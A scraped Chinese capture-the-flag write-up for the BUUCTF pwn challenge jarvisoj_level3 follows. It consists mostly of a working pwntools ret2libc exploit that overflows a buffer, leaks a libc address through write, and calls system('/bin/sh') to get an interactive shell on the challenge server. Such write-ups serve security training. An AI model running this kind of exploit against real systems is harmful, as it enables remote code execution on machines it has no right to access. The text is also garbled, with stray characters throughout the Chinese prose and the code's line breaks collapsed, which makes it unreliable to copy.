[BUUCTF-pwn]——jarvisoj_level3

• 題目地址: https://buuoj.cn/challenges#jarvisoj_level3

以前好像寫過(guò)這個(gè)題, 就不詳細(xì)寫了。有興趣的可以去之前的博客翻一下, 就在BUU和OJ 里面

大致思路, 泄露出一個(gè)地址, 找到對(duì)應(yīng)的libc版本。計(jì)算偏移找到system和’/bin/sh’

exploit

from pwn import * from LibcSearcher import *p = remote("node3.buuoj.cn",27068) elf = ELF("./level3") #gdb.attach(p, "b *0x08048482") write_got = elf.got['write'] write_plt = elf.plt['write']main = 0x0804844Bpayload = 'a' * (0x88 + 0x4) + p32(write_plt) + p32(main) + p32(1) + p32(write_got) + p32(8)p.sendafter("Input:\n", payload) write_addr = u32(p.recv(4)) print hex(write_addr)libc = LibcSearcher("write", write_addr) libc_base = write_addr - libc.dump("write") sys_addr = libc_base + libc.dump("system") binsh = libc_base + libc.dump("str_bin_sh")payload = 'a' * (0x88 + 0x4) + p32(sys_addr) + p32(0) + p32(binsh) p.sendlineafter("Input:\n", payload) p.interactive()

總結(jié)

以上是生活随笔為你收集整理的[BUUCTF-pwn]——jarvisoj_level302-21的全部?jī)?nèi)容，希望文章能夠幫你解決所遇到的問(wèn)題。

如果覺(jué)得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。